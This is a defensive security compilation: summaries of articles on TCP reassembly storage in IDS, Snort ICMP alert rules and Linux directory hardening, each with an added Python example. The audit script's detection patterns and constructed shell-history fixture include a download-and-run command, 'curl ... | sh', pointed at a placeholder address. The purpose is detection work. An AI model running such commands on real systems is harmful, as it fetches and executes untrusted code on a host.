-
Optimizing TCP Reassembly in Intrusion Detection Systems: Reducing Storage Overhead and Enhancing Performance
TCP reassembly in intrusion detection is essential but storage-intensive, because out-of-order segments must be held until the stream can be inspected in order. Optimization methods include software tweaks to the reassembly buffers and hardware offloading, for example to an FPGA.
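As an added example (not code from the article above), the Python reassembler below makes the storage cost visible: a per-flow high-water mark of out-of-order bytes held, plus two software tweaks that bound it (trimming bytes already delivered, and a hard per-flow cap). The segment trace in `demo()` is constructed; sequence-number wrap-around and per-direction state are deliberately left out.

```python
"""Minimal in-order TCP stream reassembler with storage accounting.

Added example, not code from the linked article.  It shows why an IDS must
hold out-of-order segments before it can inspect the stream, and two
software-side tweaks that bound that storage.  Sequence-number wrap-around
and per-direction state are ignored to keep the demo short.
"""
from dataclasses import dataclass, field


@dataclass
class Segment:
    seq: int       # sequence number of the first payload byte
    data: bytes


@dataclass
class Reassembler:
    isn: int                      # initial sequence number = next byte expected
    max_buffered: int = 1 << 16   # per-flow cap on out-of-order bytes held
    next_seq: int = field(init=False, default=0)
    pending: dict = field(default_factory=dict)     # seq -> bytes held for a hole
    delivered: bytearray = field(default_factory=bytearray)
    peak_buffered: int = 0        # high-water mark of held bytes (the storage cost)
    dropped: int = 0              # bytes refused because the cap was hit

    def __post_init__(self):
        self.next_seq = self.isn

    def buffered(self):
        return sum(len(d) for d in self.pending.values())

    def push(self, seg):
        seq, data = seg.seq, seg.data
        # Tweak 1: trim bytes below next_seq.  They were already delivered
        # (or are a retransmission), so holding them again only costs memory.
        if seq < self.next_seq:
            cut = self.next_seq - seq
            if cut >= len(data):
                return                      # nothing new in this segment
            seq, data = self.next_seq, data[cut:]
        if seq == self.next_seq:
            self.delivered += data
            self.next_seq += len(data)
            self._drain()
            return
        # A hole precedes this segment: it has to wait for the missing bytes.
        # Tweak 2: a hard cap bounds what one flow can make the sensor store,
        # so a peer that never fills the hole cannot exhaust memory.
        if self.buffered() + len(data) > self.max_buffered:
            self.dropped += len(data)
            return
        if len(data) > len(self.pending.get(seq, b"")):
            self.pending[seq] = data        # keep the longer copy of a duplicate
        self.peak_buffered = max(self.peak_buffered, self.buffered())

    def _drain(self):
        # Release held segments that now start at or before next_seq.
        while True:
            ready = [s for s in self.pending if s <= self.next_seq]
            if not ready:
                return
            seq = min(ready)
            data = self.pending.pop(seq)
            cut = self.next_seq - seq
            if cut < len(data):
                self.delivered += data[cut:]
                self.next_seq += len(data) - cut


def demo():
    """Constructed single-flow trace with scrambled arrival order."""
    r = Reassembler(isn=1000, max_buffered=32)
    r.push(Segment(1010, b"GET /admin"))      # hole at 1000..1009: held
    r.push(Segment(1020, b" HTTP/1.1\r\n"))    # still behind the hole: held
    r.push(Segment(1000, b"0123456789"))      # fills the hole; both drain
    r.push(Segment(1005, b"56789GET /"))      # pure retransmission: trimmed away
    r.push(Segment(1100, b"A" * 40))          # beyond the cap: refused, not stored
    return {
        "stream": bytes(r.delivered),
        "peak_buffered": r.peak_buffered,
        "dropped": r.dropped,
        "still_buffered": r.buffered(),
    }


if __name__ == "__main__":
    print(demo())
```

The cap is the part worth thinking about in a real sensor: dropping a held segment means the stream is later delivered with a gap, so production engines pair it with a per-flow policy (evasion alert, flow bypass) rather than silently discarding.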
-
Understanding ICMP Alerts: GPL SCAN Broadscan Smurf & ICMP Info Redirect
ICMP alert rules such as GPL SCAN Broadscan Smurf Scanner (sid:2100478) and the GPL ICMP Info TOS Redirect rule (sid:2100436) identify these probes and classify them as attempted-recon and misc-activity respectively.
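As an added example (not the article's code), the Python below parses two rules written in Snort syntax and runs constructed ICMP packets through them. The rule text is modelled on the ET GPL rules named above but is not a copy of the official rules; the ICMP type and code values are from RFC 792 (echo request is type 8; redirect is type 5, code 3 meaning "redirect for type of service and host").

```python
"""Parse Snort-style ICMP rules and run constructed ICMP packets through them.

Added example, not the article's code.  The two rules are written for this
example in Snort syntax, modelled on the ET GPL rules the article covers
(sids 2100478 and 2100436) but not copied from the official rule text.
"""
import re
from dataclasses import dataclass

RULES = [
    'alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL SCAN Broadscan Smurf Scanner"; '
    'itype:8; dsize:4; icmp_id:0; icmp_seq:0; classtype:attempted-recon; sid:2100478; rev:1;)',
    'alert icmp any any -> $HOME_NET any (msg:"GPL ICMP_INFO Redirect for TOS and Host"; '
    'itype:5; icode:3; classtype:misc-activity; sid:2100436; rev:1;)',
]

# Snort classtype -> the short label used in the summary above.
CATEGORY = {"attempted-recon": "recon", "misc-activity": "misc"}

HEADER = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+->\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s+\((?P<opts>.*)\)\s*$"
)
# key:value; pairs, value either "quoted" or unquoted.  Flag-only options
# such as "nocase;" are not needed by these rules and are not handled.
OPTION = re.compile(r'([a-z_]+)\s*:\s*("(?:[^"\\]|\\.)*"|[^;]*)\s*;')


def parse_rule(text):
    m = HEADER.match(text)
    if not m:
        raise ValueError("not a rule header: " + text)
    rule = {k: m.group(k) for k in ("action", "proto", "src", "sport", "dst", "dport")}
    opts = {}
    for key, val in OPTION.findall(m.group("opts")):
        val = val.strip()
        if val.startswith('"'):
            val = val[1:-1]
        elif val.lstrip("-").isdigit():
            val = int(val)
        opts[key] = val
    rule["options"] = opts
    return rule


@dataclass
class IcmpPacket:
    itype: int
    icode: int = 0
    icmp_id: int = 0     # identifier field (echo messages)
    icmp_seq: int = 0    # sequence field (echo messages)
    dsize: int = 0       # payload bytes after the 8-byte ICMP header


def matches(rule, pkt):
    """Exact-value checks only; Snort's dsize ranges (dsize:>4) are not modelled."""
    opts = rule["options"]
    fields = {"itype": pkt.itype, "icode": pkt.icode, "icmp_id": pkt.icmp_id,
              "icmp_seq": pkt.icmp_seq, "dsize": pkt.dsize}
    return rule["proto"] == "icmp" and all(
        opts[k] == v for k, v in fields.items() if k in opts)


def classify(packets, rules=RULES):
    """Return (sid, msg, category) for every rule each packet triggers."""
    parsed = [parse_rule(r) for r in rules]
    alerts = []
    for pkt in packets:
        for rule in parsed:
            if matches(rule, pkt):
                o = rule["options"]
                alerts.append((o["sid"], o["msg"], CATEGORY.get(o["classtype"], "unknown")))
    return alerts


def demo_packets():
    # Constructed traffic: a Broadscan-style probe (4-byte echo request with
    # id 0 and seq 0), an ordinary ping, a TOS-and-host redirect, and a plain
    # host redirect (code 1) that the second rule deliberately does not cover.
    return [
        IcmpPacket(itype=8, icmp_id=0, icmp_seq=0, dsize=4),
        IcmpPacket(itype=8, icmp_id=4242, icmp_seq=1, dsize=56),
        IcmpPacket(itype=5, icode=3),
        IcmpPacket(itype=5, icode=1),
    ]


if __name__ == "__main__":
    for sid, msg, category in classify(demo_packets()):
        print(f"sid {sid}: {msg} [{category}]")
```

The ordinary ping in the trace is the false-positive check: the Smurf rule keys on the unusual id/seq/size combination, not on echo requests as such, which is why it sits in attempted-recon rather than a noisier class.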
-
Securing Sensitive Directories: Best Practices for Monitoring and Hardening on Linux Systems
Examine sensitive directories such as /tmp and hidden (dot) folders for unexpected or world-writable files. Check last access times and shell command history for signs of tampering. Logs under /var/log help trace the cause of an incident.
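As an added example (not code from the article above), the Python below implements the three checks the summary names: a scan of a /tmp-style directory for world-writable entries, hidden directories and recently accessed files; a grep of shell history for commands that deserve a second look; and a count of failed SSH logins per source address from auth-log lines. The directory tree, history lines and log lines are constructed fixtures so it runs offline; the history patterns are illustrative choices, not a complete list.

```python
"""Audit of a /tmp-style directory, shell history and auth log entries.

Added example, not from the linked article.  The directory tree, history
file and log lines are constructed fixtures so the checks run offline;
point the functions at real paths to use them on a host.
"""
import os
import re
import stat
import tempfile
import time
from collections import Counter

# Shell-history patterns that deserve a second look (illustrative, not complete).
HISTORY_PATTERNS = [
    re.compile(r"(curl|wget)[^|]*\|\s*(ba)?sh"),   # download piped straight into a shell
    re.compile(r"chmod\s+\+?x\s+/tmp/"),            # making something executable in /tmp
    re.compile(r"base64\s+(-d|--decode)"),          # decoding an embedded payload
    re.compile(r"history\s+-c|unset\s+HISTFILE"),   # covering tracks
]
AUTH_FAIL = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")


def audit_dir(root, now=None, recent_seconds=3600):
    """World-writable entries, hidden directories and recently accessed files
    (by atime) directly under root.  Names are relative to root."""
    now = time.time() if now is None else now
    report = {"world_writable": [], "hidden_dirs": [], "recent_atime": []}
    for entry in sorted(os.scandir(root), key=lambda e: e.name):
        st = entry.stat(follow_symlinks=False)
        if st.st_mode & stat.S_IWOTH and not stat.S_ISLNK(st.st_mode):
            report["world_writable"].append(entry.name)
        if entry.name.startswith(".") and entry.is_dir(follow_symlinks=False):
            report["hidden_dirs"].append(entry.name)
        # atime is only a hint: noatime mounts never update it and relatime
        # updates it at most once a day relative to mtime.
        if entry.is_file(follow_symlinks=False) and now - st.st_atime <= recent_seconds:
            report["recent_atime"].append(entry.name)
    return report


def suspicious_history(lines):
    return [line for line in lines if any(p.search(line) for p in HISTORY_PATTERNS)]


def failed_logins(lines):
    """Count sshd 'Failed password' events per source address."""
    return Counter(m.group(2) for m in map(AUTH_FAIL.search, lines) if m)


def build_demo_tree(now=None):
    """Constructed fixture standing in for /tmp: a world-writable script
    accessed a minute ago, a benign file last touched a month ago, and a
    hidden directory of the kind an attacker might use to stage tools."""
    now = time.time() if now is None else now
    root = tempfile.mkdtemp(prefix="audit-demo-")
    hidden = os.path.join(root, ".cache-x")
    os.mkdir(hidden)
    os.chmod(hidden, 0o755)
    script = os.path.join(root, "evil.sh")
    with open(script, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(script, 0o777)
    os.utime(script, (now - 60, now - 60))
    notes = os.path.join(root, "notes.txt")
    with open(notes, "w") as f:
        f.write("todo\n")
    os.chmod(notes, 0o644)
    os.utime(notes, (now - 30 * 86400, now - 30 * 86400))
    return root


def demo():
    now = time.time()
    history = [                                       # constructed ~/.bash_history
        "ls -la /var/log",
        "curl -s http://198.51.100.9/x.sh | sh",
        "chmod +x /tmp/evil.sh",
        "vim notes.txt",
    ]
    auth_log = [                                      # constructed /var/log/auth.log lines
        "Mar  9 10:01:02 host sshd[1234]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2",
        "Mar  9 10:01:05 host sshd[1234]: Failed password for root from 203.0.113.7 port 51236 ssh2",
        "Mar  9 10:02:00 host sshd[1240]: Accepted publickey for deploy from 198.51.100.4 port 40000 ssh2",
    ]
    report = audit_dir(build_demo_tree(now), now=now)
    report["history"] = suspicious_history(history)
    report["failed_logins"] = dict(failed_logins(auth_log))
    return report


if __name__ == "__main__":
    print(demo())
```

On a real host, remember that an attacker with shell access can edit or truncate .bash_history and reset atimes with touch, so treat both as corroborating evidence rather than proof; the auth log on a remote syslog collector is the copy to trust.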